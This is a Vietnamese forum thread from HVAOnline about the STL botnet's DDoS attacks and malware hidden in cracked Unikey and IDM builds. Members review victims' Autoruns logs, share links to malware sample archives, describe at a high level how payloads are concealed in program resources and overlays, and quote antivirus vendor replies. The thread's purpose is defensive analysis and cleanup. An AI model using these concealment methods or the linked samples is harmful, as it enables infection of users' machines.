Theo em khảo sát (và theo một số thông tin nội bộ), vietnamnet có đủ kinh phí để kiện toàn một hệ thống báo chí mạng có bài bản và vững vàng. Tuy nhiên, chuyện ở đây không phải là chuyện phê bình hay đánh giá khía cạnh kỹ thuật IT của vietnamnet mà là chuyện vietnamnet bị đánh triền miên nhưng chính trên trang vietnamnet cũng đưa tin qua loa. Ngay trên trang thanhnien còn đưa tin là "vietnamnet bị đánh nhẹ" :P . Tại sao? Đầu năm 2010 và lần này, vietnamnet không hề bị "đánh nhẹ". Nếu cho rằng botnet đánh HVA ngang ngửa botnet đánh vietnamnet thì em tin rằng ở thời điểm cao độ, vietnamnet đón nhận ít nhất là 500Mbit DDoS chớ không ít hơn. Đây không thể được xem là nhẹ. Nếu vietnamnet không muốn tuyên bố chính thức (vì lý do nào đó) thì đó là quyền của họ nhưng điều này không có nghĩa rằng thực tế sự việc là "nhẹ" bởi vì anh em ta là dân kỹ thuật, anh em ta không thể chấp nhận những điều không đúng thực tế.

PXMMRF wrote:
Cũng có một điều là các công ty, xí nghiệp, tổ chức của VN thường có bệnh thành tích. Và vì vậy họ thường giấu kín các khuyết điểm, không muốn nói ra các khó khăn. Sơ bị trên đánh giá là thiếu năng lưc hoan thành nhiệm vụ.... Mà có nhờ ai, thì họ phải tìm những cơ quan lớn, cơ quan cấp trên (như Bộ Khoa học công nghệ chẳng hạn). Ai lai nhờ HVA, sợ mang tiếng. Thế đấy. Hi hì.  
Đây là chuyện nhức nhối và đây là chuyện cần phải thay đổi tận gốc. Như em đã có lần nhận xét rằng, những vết thương ung mủ không chịu chữa trị thì dần dần sẽ dẫn đến hoại thư cho cả một cơ thể là vậy. Bịnh thành tích là hội chứng của sự mặc cảm, sự sợ hãi sự thật và thói quen che đậy. Những căn bịnh này dần dần sẽ huỷ hoại sự thật, huỷ hoại đức tính trung thực, huỷ hoại lòng dũng cảm đối diện với thiếu sót để thay đổi và phát triển. Đây không phải là chuyện đùa nữa rồi.

PXMMRF wrote:
Tôi cũng nghĩ là các thành viên STL là người VN 100%, như chính chúng ta. Chỉ có tổ chức lãnh đạo, trả lương và điều khiển, hướng dẫn KT cho họ là các bác TQ thôi.  
Cho đến nay, em chưa tìm ra bất cứ một giềng mối nào chứng minh có sự liên can đến tổ chức lãnh đạo của stl là các bác TQ. Theo em thấy, đây cũng chỉ là speculation thôi chớ chưa có gì chắc chắn hết. Nếu em có tư cách pháp nhân như đại diện của một tổ chức chính thức của nhà nước (như vncert hoặc bộ viễn thông chẳng hạn) thì em thừa sức truy ra nguồn gốc lãnh đạo của stl là ai.]]>
/hvaonline/posts/list/39641.html#246234 /hvaonline/posts/list/39641.html#246234 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
Cụ thể là bạn scan và gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho mình theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/ 
Em gởi anh các file theo hướng dẫn a gởi. http://www.mediafire.com/?ua2xhwjvhxuz8w9 Tuy nhiên có bước thứ 2, e tạo file Autorunsc.bat - Copy vào thư mục chứa autorunsc.exe - sau đó chạy file .bat thì nó chạy như hình (e add trong file rar đã dẫn link ở trên) sau đó nó tự đóng lại mà k tạo ra 2 file log autorunsc_result.txt và autorunsc_result.csv như anh nói. PS: cái còm e gởi hồi trưa là lúc đang ở trường. Lúc làm cái này e lại đang ở nhà và e lại vào blogspot bình thường. Hik]]>
/hvaonline/posts/list/39641.html#246242 /hvaonline/posts/list/39641.html#246242 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246246 /hvaonline/posts/list/39641.html#246246 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn Kể ra up cũng khá nhiều, và hầu hết đã bị Avira chụp hết, ngay cả cái IAStor cũng đã được đưa vào danh sách. Avira số 1, KAV+MS số 2. Bỏ công sức ra viết mail cũng đáng.]]> /hvaonline/posts/list/39641.html#246249 /hvaonline/posts/list/39641.html#246249 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246250 /hvaonline/posts/list/39641.html#246250 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

chieutuongtu wrote:

bolzano_1989 wrote:
Cụ thể là bạn scan và gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho mình theo đúng hướng dẫn ở các bài viết sau: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line) http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/ Hướng dẫn scan và gửi log TCPView http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/ 
Em gởi anh các file theo hướng dẫn a gởi. http://www.mediafire.com/?ua2xhwjvhxuz8w9 Tuy nhiên có bước thứ 2, e tạo file Autorunsc.bat - Copy vào thư mục chứa autorunsc.exe - sau đó chạy file .bat thì nó chạy như hình (e add trong file rar đã dẫn link ở trên) sau đó nó tự đóng lại mà k tạo ra 2 file log autorunsc_result.txt và autorunsc_result.csv như anh nói. PS: cái còm e gởi hồi trưa là lúc đang ở trường. Lúc làm cái này e lại đang ở nhà và e lại vào blogspot bình thường. Hik 
Bạn đã tạo file Autorunsc.bat có nội dung không đúng với hướng dẫn rồi.]]>
/hvaonline/posts/list/39641.html#246251 /hvaonline/posts/list/39641.html#246251 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 wrote:
Mình có thắc mắc là sau khi diệt xong hết bot của STL thì phải mất bao lâu chúng mới có lại 1 botnet mới? 
Theo tớ thấy, với tình hình xài đồ crackz, xài warez và ý thức về vấn đề bảo mật thông tin của người dùng còn quá kém như hiện tại thì việc hình thành một botnet có lẽ chỉ mất vài tuần hoặc chậm lắm là vài tháng.]]>
/hvaonline/posts/list/39641.html#246257 /hvaonline/posts/list/39641.html#246257 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246263 /hvaonline/posts/list/39641.html#246263 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. remove, delete, kill, uninstall ngay. Nếu dùng Firefox như tôi thì dùng cái Addon DownThemAll cũng rất tốt rồi. Cậu chieutuongtu làm ơn xoá giùm 2 soft trên: IDM: c:\program files (x86)\internet download manager\idman.exe Unikey: e:\softwares\linh tinh\unikey40rc2-1101-win64\unikeynt.exe: Ông này là virus thứ thiệt, tôi đã từng phân tích nó. Cậu tìm, zip lại và up lên mediafire các file sau: 1. c:\users\minh dtu\appdata\local\google\update\googleupdate.exe 2. c:\program files (x86)\dell datasafe local backup\components\scheduler\launcher.exe 3. c:\program files (x86)\common files\adobe\switchboard\switchboard.exe 4. c:\program files (x86)\quicktime\qttask.exe 5. c:\program files (x86)\poweriso\pwrisovm.exe 6. c:\program files (x86)\common files\nokia\mplatform\nokiamserver.exe 7. c:\program files (x86)\dell webcam\dell webcam central\webcamdell2.exe 8. c:\program files (x86)\internet download manager\idman.exe Trong đám này, có 3 file nghi ngờ nhất là googleupdate.exe, switchboard.exe, idman.exe. Hầu như log AutoRuns nào tôi cũng thấy. PS: Ngày hôm qua tình cờ đọc một bài viết của đám 29A public trên mạng, tụi nó đã có thể extract digital signature từ 1 file sạch và ghép vào 1 file malware của tụi nó. Thằng Nga này còn cung cấp source C + exe luôn. Bởi vậy, không tin cái gì được cả. Thời buổi đão lộn !]]> /hvaonline/posts/list/39641.html#246266 /hvaonline/posts/list/39641.html#246266 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
PS: Ngày hôm qua tình cờ đọc một bài viết của đám 29A public trên mạng, tụi nó đã có thể extract digital signature từ 1 file sạch và ghép vào 1 file malware của tụi nó. Thằng Nga này còn cung cấp source C + exe luôn. Bởi vậy, không tin cái gì được cả. Thời buổi đão lộn ! 
Sáng nay em cũng vừa đọc báo thấy tin này, ghê quá là ghê.]]>
/hvaonline/posts/list/39641.html#246269 /hvaonline/posts/list/39641.html#246269 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

crc32 wrote:
Tin buồn cho stl là AVAST! cũng vừa mới chộp cổ mớ malwares trong iTunes.rar. 
Nó chộp iTunesHelper.exe từ sáng sớm hôm qua (30-8-2011), khi tôi thử nghiệm lai quá trình DDoS vào mục tiêu. Bây giờ muốn thử nghiệm một số bot-DDoS tool của STL phải "chiều" chúng như "chiều vong". Phải disable Antivir guard, có lúc phải disable cả Avira, hạ hết Firewall, cẩn thận disable cả McAfee on-access scan, disable cả các chương trình dự đoán có thể conflict với nó....để STL bot có thể nhiễm được vào máy của mình. Hì hì

TQN wrote:
http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn Kể ra up cũng khá nhiều, và hầu hết đã bị Avira chụp hết, ngay cả cái IAStor cũng đã được đưa vào danh sách. Avira số 1, KAV+MS số 2. Bỏ công sức ra viết mail cũng đáng. 
Cho đến sáng nay (31.8.2011-9.00AM) Avira vẫn chưa detect đươc các files trong "IAStore_26_08_2011.zip" (gồm 5 file .dll và 1 file .exe sau khi extracted) là virus, TQN ạ! ]]>
/hvaonline/posts/list/39641.html#246270 /hvaonline/posts/list/39641.html#246270 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
PS: Ngày hôm qua tình cờ đọc một bài viết của đám 29A public trên mạng, tụi nó đã có thể extract digital signature từ 1 file sạch và ghép vào 1 file malware của tụi nó. Thằng Nga này còn cung cấp source C + exe luôn.  
Anh có link về cái public article này không anh? Nếu quả thực như vậy thì chẳng biết tin vào thằng nào nữa. #:S ]]>
/hvaonline/posts/list/39641.html#246271 /hvaonline/posts/list/39641.html#246271 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Cho đến sáng nay (31.8.2011-9.00AM) Avira vẫn chưa detect đươc các files trong "IAStore_26_08_2011.zip" (gồm 5 file .dll và 1 file .exe sau khi extracted) là virus, TQN ạ!  
Chắc chưa đưa lên database để bà con update về thôi. Thực ra lần đầu (hôm 26-08-2011) gửi cho Avira thì họ bảo đây là các file SẠCH. Em dịch nguyên bài của anh TQN phân tích mấy cơ chế của IAStor..(s) gửi cho họ :D , họ trả lời ngay là: "Dear Sir or Madam, Thank you for your mail. Sorry for the mistake. The files sent to us were analyzed by the virus lab and could be classified as malware. The detection and repair of the malware sample will be available with one of the next VDF versions. -- Freundliche Gruesse / Best regards Avira Operations GmbH & Co. KG Roland Staufert Professional Support & Services Avira Operations GmbH & Co. KG Kaplaneiweg 1, D-88069 Tettnang, Germany Internet: http://www.avira.com" Thanks TQN.]]>
/hvaonline/posts/list/39641.html#246272 /hvaonline/posts/list/39641.html#246272 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://angusj.com/resourcehacker/ BackupSvc.* và MSHelpCenter.* đều được sinh ra từ 3 cách này. Trong thư mục STLVirus mà tui đã up lên Mediafire: http://www.mediafire.com/#tz745o0f678w8, các bạn sẽ thấy 3 file fake Unikey này.]]> /hvaonline/posts/list/39641.html#246273 /hvaonline/posts/list/39641.html#246273 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
]]>
/hvaonline/posts/list/39641.html#246274 /hvaonline/posts/list/39641.html#246274 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
face digi sig năm 2010 đã được cảnh báo rồi đây là face digi sig của Avira
 
Nếu như những gì thể hiện trong hình của mv1098 thì Signature này bị warning rồi, không đáng kể. Chỉ sợ verify mà không cảnh báo gì thì chịu chết. Theo như mình hiểu nội dung của anh TQN thì dùng cert sạch ký cho 1 binary thành 1 file sạch.]]>
/hvaonline/posts/list/39641.html#246275 /hvaonline/posts/list/39641.html#246275 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246276 /hvaonline/posts/list/39641.html#246276 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Tới nay, tôi đã biết và RCE 3 cách cài cắm malware vào Unikey trôi nổi trên mạng: 1. Dùng overlay data, gắn vào đuôi file fake Unikey: Overlay data này bắt đầu = string "NullsoftInst" mà các bạn đã biết trong post trước. Tôi cũng đã post 010 Editor script để extract và decrypt các malwares đó ra. File DecodeBin.1sc. 2. Dùng các Bmp resource giả nhúng vào resource của file fake Unikey: Cách mà MSHelpCenter.exe được sinh ra. Các bitmap resource này có tên sau: - Background10311 - Pattern2066 - Pattern5230 - Background10252 - Pattern1034 3. Cũng dùng resource, nhưng nhúng vào RCDATA, với name 1, 2, 3, 4, 5, 6. Đây là fake Unikey64 mà cậu chieutuongtu đang dính. 010 Editor script để giãi mã cho đám này tôi cũng đã post lên, file DecodeRes.1sc. Các 010 Editor script đó nằm trong file zip DecodeSTLVirus.zip mà tôi đã up ở Mediafire. Để khảo sát resource của 1 EXE, DLL... (nói chung là PE file), các bạn có thể down và dùng tool này: Resource Hacker, free, good http://angusj.com/resourcehacker/ 
Hi anh TQN: Nếu bỏ IDM, em tiếc quá anh. Em đang dùng Unikey và IDM này http://www.mediafire.com/?er804a4eltd07ht . Em nhờ anh kiểm tra dùm em xem có bị malware của STL không ạ?]]>
/hvaonline/posts/list/39641.html#246277 /hvaonline/posts/list/39641.html#246277 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246278 /hvaonline/posts/list/39641.html#246278 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246279 /hvaonline/posts/list/39641.html#246279 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.


]]>
/hvaonline/posts/list/39641.html#246280 /hvaonline/posts/list/39641.html#246280 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246283 /hvaonline/posts/list/39641.html#246283 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246284 /hvaonline/posts/list/39641.html#246284 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246285 /hvaonline/posts/list/39641.html#246285 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246286 /hvaonline/posts/list/39641.html#246286 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:
Rất nhiều virus của STL khi kiểm tra VirusTotal thì không một antivirus nào phát hiện cả (fully undetected) nên việc dùng VirusTotal để kiểm tra file một cách mù quáng là rất không nên. Đặc biệt cần tránh các bản IDM portable được quảng cáo là đã được crack sẵn (được nhét virus, trojan sẵn mới đúng). 
Tiêu rồi, sao giống IDM của mình đang dùng quá vậy trời, IDM mình cũng tự crack luôn bolzano_1989 ơi. Cảm ơn bolzano_1989, mình sẽ giới thiệu và gửi link bài viết "Kiến thức và kĩ năng sử dụng máy tính an toàn và bảo mật" cho mọi người trong công ty, trong list yahoo messenger, và facebook của mình luôn.]]>
/hvaonline/posts/list/39641.html#246287 /hvaonline/posts/list/39641.html#246287 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:

crc32 wrote:
Tin buồn cho stl là AVAST! cũng vừa mới chộp cổ mớ malwares trong iTunes.rar. 
Nó chộp iTunesHelper.exe từ sáng sớm hôm qua (30-8-2011), khi tôi thử nghiệm lai quá trình DDoS vào mục tiêu. Bây giờ muốn thử nghiệm một số bot-DDoS tool của STL phải "chiều" chúng như "chiều vong". Phải disable Antivir guard, có lúc phải disable cả Avira, hạ hết Firewall, cẩn thận disable cả McAfee on-access scan, disable cả các chương trình dự đoán có thể conflict với nó....để STL bot có thể nhiễm được vào máy của mình. Hì hì

TQN wrote:
http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn Kể ra up cũng khá nhiều, và hầu hết đã bị Avira chụp hết, ngay cả cái IAStor cũng đã được đưa vào danh sách. Avira số 1, KAV+MS số 2. Bỏ công sức ra viết mail cũng đáng. 

crc32 wrote:
Tin buồn cho stl là AVAST! cũng vừa mới chộp cổ mớ malwares trong iTunes.rar. 
Cho đến sáng nay (31.8.2011-9.00AM) Avira vẫn chưa detect đươc các files trong "IAStore_26_08_2011.zip" (gồm 5 file .dll và 1 file .exe sau khi extracted) là virus, TQN ạ!  
Ủa sao ngộ vậy ta, em sử dụng Avast 6 up date mới nhất sao không detect được "IAStore_26_08_2011.zip" (gồm 5 file .dll và 1 file .exe sau khi extracted) là virus Sau khi giải nén và scan thì nó im ru luôn?]]>
/hvaonline/posts/list/39641.html#246289 /hvaonline/posts/list/39641.html#246289 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
PS: Ngày hôm qua tình cờ đọc một bài viết của đám 29A public trên mạng, tụi nó đã có thể extract digital signature từ 1 file sạch và ghép vào 1 file malware của tụi nó. Thằng Nga này còn cung cấp source C + exe luôn. Bởi vậy, không tin cái gì được cả. Thời buổi đão lộn ! 
Em nghĩ việc qua mặt việc kiểm tra digital signature này chỉ có thể thực hiện được một khi malware đã được thực thi, có phải đúng như vậy không anh :) ?]]>
/hvaonline/posts/list/39641.html#246290 /hvaonline/posts/list/39641.html#246290 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246292 /hvaonline/posts/list/39641.html#246292 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246297 /hvaonline/posts/list/39641.html#246297 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
http://www.theregister.co.uk/2011/08/30/google_chrome_certificate_blacklist/
]]>
/hvaonline/posts/list/39641.html#246299 /hvaonline/posts/list/39641.html#246299 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. private key thì không thể sign được chữ ký đúng, private key là do CA nắm giữ. Khi đem extract digital signature từ 1 file "sạch" thì chỉ gom được thông tin của thằng chủ và public key của nó mà thôi. Việc virus maker tự ký lại file malware thì dĩ nhiên là khả thi, nhưng chữ kí (lại) đó sẽ không được trust bởi CA.
Em tưởng mấy tool verify digital signature nó phải checksum cả image nữa chứ nhỉ, chứ kiểm tra mỗi cái phần thẻ digital sig không thì dính đòn cũng phải. 
Digital signature đính trên file nào thì sẽ dựa trên one-way hash của file đó để verify. Ví dụ, Microsoft cần kí lên file iexplore.exe, họ sẽ one-way hash file đó thành M, và dùng private key (K) của mình (do CA cung cấp) để mã hoá M thành D, D chính là chữ kí số sẽ đính kèm theo iexplore.exe để xác nhận chủ nhân của nó là Microsoft.Code:
D = Digest[M, K]
Khi bác muốn kiểm tra iexplore.exe của mình có phải do Microsoft kí hay không, bác dùng Public key (P) dựa trên certificate từ trusted CA đã nói để giải mã cái D đính kèm ở trên (là chữ kí số của IE) thành M', nếu M' có kết quả giống với one-way hash của iexplore.exe đang sử dụng thì chữ kí đó được tin cậy. Mọi thông tin về thuật toán one-way hash, chủ sở hữu, public key, thời gian hiệu lực... đều gói trong một giấy chứng nhận gọi là digital certificate sở hữu bởi một CA hợp pháp. (Dĩ nhiên bác cũng có thể tạo được giấy chứng nhận của riêng mình, nhưng sẽ chẳng ai tin bác là đứa nào hết)]]>
/hvaonline/posts/list/39641.html#246302 /hvaonline/posts/list/39641.html#246302 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Không em, tụi virus writer sau khi compile, build ra file virus, malware thì sẽ dùng tool đó để attach good digital signature vào file virus, malware, không cần chính virus, malware đó được run. 
Vậy vấn đề ở đây nằm ở các tool verify code signature rồi, không rõ hiện những tool verify code signature nào có thể bị qua mặt bởi cái tool attach good digital signature kia vậy anh?]]>
/hvaonline/posts/list/39641.html#246305 /hvaonline/posts/list/39641.html#246305 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
]]>
/hvaonline/posts/list/39641.html#246306 /hvaonline/posts/list/39641.html#246306 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246309 /hvaonline/posts/list/39641.html#246309 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246311 /hvaonline/posts/list/39641.html#246311 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Đây là chuyện nhức nhối và đây là chuyện cần phải thay đổi tận gốc. Như em đã có lần nhận xét rằng, những vết thương ung mủ không chịu chữa trị thì dần dần sẽ dẫn đến hoại thư cho cả một cơ thể là vậy. Bịnh thành tích là hội chứng của sự mặc cảm, sự sợ hãi sự thật và thói quen che đậy. Những căn bịnh này dần dần sẽ huỷ hoại sự thật, huỷ hoại đức tính trung thực, huỷ hoại lòng dũng cảm đối diện với thiếu sót để thay đổi và phát triển. Đây không phải là chuyện đùa nữa rồi. Điều này lằm tôi rất buồn . Làm thế nào mà thay đổi tận gốc được đây . Không nhẽ bảo tôi tự chặt chân mình đi à ? Cái điều tôi sợ nhất là phải nhổ cái cây ấy đi và trồng cây khác . Lại đau đầu .]]> /hvaonline/posts/list/39641.html#246315 /hvaonline/posts/list/39641.html#246315 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246316 /hvaonline/posts/list/39641.html#246316 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Sherlockok wrote:
Vừa thấy comodo báo trong máy có thằng iastordatamgrsvc.exe connect tới ip 119.153.92.110 . Đây có phải malware đã nêu không ạ ? Có cần mình upload lên không ? Cám ơn! 
Virus chắc chắn đó bạn ơi, IP kia ở tận PESHAWAR, PAKISTAN. Bạn cứ upload file lên đi.]]>
/hvaonline/posts/list/39641.html#246318 /hvaonline/posts/list/39641.html#246318 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 wrote:

Sherlockok wrote:
Vừa thấy comodo báo trong máy có thằng iastordatamgrsvc.exe connect tới ip 119.153.92.110 . Đây có phải malware đã nêu không ạ ? Có cần mình upload lên không ? Cám ơn! 
Virus chắc chắn đó bạn ơi, IP kia ở tận PESHAWAR, PAKISTAN. Bạn cứ upload file lên đi. 
http://www.mediafire.com/?aezh4rtiubv476k http://www.mediafire.com/?dt4j25v4953w46f http://www.mediafire.com/?q7l5ihx8x7t03nl http://www.mediafire.com/?g112gycu83jz339 http://www.mediafire.com/?d42pd48l3ekidqb http://www.mediafire.com/?1p92q8ww04trxuh ]]>
/hvaonline/posts/list/39641.html#246323 /hvaonline/posts/list/39641.html#246323 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TMT102 wrote:
Đây là chuyện nhức nhối và đây là chuyện cần phải thay đổi tận gốc. Như em đã có lần nhận xét rằng, những vết thương ung mủ không chịu chữa trị thì dần dần sẽ dẫn đến hoại thư cho cả một cơ thể là vậy. Bịnh thành tích là hội chứng của sự mặc cảm, sự sợ hãi sự thật và thói quen che đậy. Những căn bịnh này dần dần sẽ huỷ hoại sự thật, huỷ hoại đức tính trung thực, huỷ hoại lòng dũng cảm đối diện với thiếu sót để thay đổi và phát triển. Đây không phải là chuyện đùa nữa rồi. 
Điều này lằm tôi rất buồn . Làm thế nào mà thay đổi tận gốc được đây . Không nhẽ bảo tôi tự chặt chân mình đi à ? Cái điều tôi sợ nhất là phải nhổ cái cây ấy đi và trồng cây khác . Lại đau đầu . 
Vấn đề nằm ở chỗ chấp nhận để cái cây ấy sống dở, chết dở, đang bị ung rữa dần dần để rồi một lúc nào đó nó sẽ ngã nhào hay là đốn cái cây đã bị bệnh nặng ấy đi để trồng cây khác hay không thôi. Bạn chặt chân bạn hoàn toàn khác việc bạn chặt một cái cây bị ung hoại. Bạn đau đầu vì thấy cái cây ấy đang ung rữa hơn là bạn đau đầu vì phải chặt cái cây đang bị ung rữa? Nếu bạn thấy việc chặt nó đau đầu hơn là việc ngồi nhìn nó ung rữa thì đừng chặt.]]>
/hvaonline/posts/list/39641.html#246332 /hvaonline/posts/list/39641.html#246332 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246333 /hvaonline/posts/list/39641.html#246333 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Iwwaty wrote:
Anh bozalno_1989 xem hộ em log này với, em đã scan theo hướng dẫn của anh. http://www.mediafire.com/?l34farrkbldu7av 
Nhìn vô là thấy ngay mấy ông này: "C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe" c:\windows\system32\themeservice.dll c:\windows\system32\drivers\netaapl64.sys c:\program files (x86)\ati technologies\ati.ace\core-static\atiacm64.dll c:\program files\common files\ati technologies\multimedia\atimpenc64.dll Bồ upload mấy ông này lên xem sao?]]>
/hvaonline/posts/list/39641.html#246334 /hvaonline/posts/list/39641.html#246334 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246336 /hvaonline/posts/list/39641.html#246336 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

thinh191 wrote:
Sáng nay ghost lại bản ghost win XP để test thử thì thấy AV báo phát hiện: file:G:\WINDOWS\GoogleCrashHandler.exe Trojan:Win32/Sisron từ trước đến giờ vẫn dùng bản ghost này mà ko thấy báo, hoá ra nó nằm ở trong bản ghót này lâu ròi 
Bồ coi thử created date của con này là ngày tháng năm nào vậy?]]>
/hvaonline/posts/list/39641.html#246338 /hvaonline/posts/list/39641.html#246338 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

Iwwaty wrote:
Anh bozalno_1989 xem hộ em log này với, em đã scan theo hướng dẫn của anh. http://www.mediafire.com/?l34farrkbldu7av 
Nhìn vô là thấy ngay mấy ông này: "C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe" c:\windows\system32\themeservice.dll c:\windows\system32\drivers\netaapl64.sys c:\program files (x86)\ati technologies\ati.ace\core-static\atiacm64.dll c:\program files\common files\ati technologies\multimedia\atimpenc64.dll Bồ upload mấy ông này lên xem sao? 
Chào anh Conmale, Cảm ơn anh đã quan tâm đến em, đây là những file anh yêu cầu. http://www.mediafire.com/?ba9ugwab9ec70je File Adobelmsvc.exe em không upload được vì tối qua em đã uninstall toàn bộ những gì liên quan đến Adobe ( trừ flash plugin ) rồi nên file này không còn tồn tại nữa. Chúc anh và mọi người có 1 ngày tốt lành.]]>
/hvaonline/posts/list/39641.html#246339 /hvaonline/posts/list/39641.html#246339 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. IAStorCommon.dll, IAStorDataMgr.dll, IAStorUIHelper.dll, iTunesHelper-tray.exe_, SmartPin.dll, SysInftLib.dll No malicious code were found in these files. IAStorDataMgrSvc.exe- Trojan-Downloader.Win32.Agent.tbhb New malicious software was found in these files. Detection will be included in the next update. Thank you for your help. ituneshelper.exe_ - Trojan.Win32.Diple.acxu k113.css - Backdoor.Win32.Agent.bqwm ....................... ....................... Regards, Dmitry Kirsanov Virus Analyst, Kaspersky Lab.   Cái đống dll đi kèm của IAStor nó cứ khăng khăng với em là file sạch. Vậy cũng không sao, vì nếu IAStorDataMgrSvc.exe bị thịt rồi thì cái đống dll đó vô dụng.]]> /hvaonline/posts/list/39641.html#246348 /hvaonline/posts/list/39641.html#246348 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246349 /hvaonline/posts/list/39641.html#246349 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Iwwaty wrote:

conmale wrote:

Iwwaty wrote:
Anh bozalno_1989 xem hộ em log này với, em đã scan theo hướng dẫn của anh. http://www.mediafire.com/?l34farrkbldu7av 
Nhìn vô là thấy ngay mấy ông này: "C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe" c:\windows\system32\themeservice.dll c:\windows\system32\drivers\netaapl64.sys c:\program files (x86)\ati technologies\ati.ace\core-static\atiacm64.dll c:\program files\common files\ati technologies\multimedia\atimpenc64.dll Bồ upload mấy ông này lên xem sao? 
Chào anh Conmale, Cảm ơn anh đã quan tâm đến em, đây là những file anh yêu cầu. http://www.mediafire.com/?ba9ugwab9ec70je File Adobelmsvc.exe em không upload được vì tối qua em đã uninstall toàn bộ những gì liên quan đến Adobe ( trừ flash plugin ) rồi nên file này không còn tồn tại nữa. Chúc anh và mọi người có 1 ngày tốt lành. 
Ông nội Adobelmsvc.exe là đáng ngờ nhất mà bồ đã cho nó đi rồi thì đành chịu. Ông nội themeservice.dll cũng có những biểu hiện khá đáng ngờ nhưng thiếu đầu, thiếu đuôi thì cũng khó xác định được.]]>
/hvaonline/posts/list/39641.html#246350 /hvaonline/posts/list/39641.html#246350 GMT
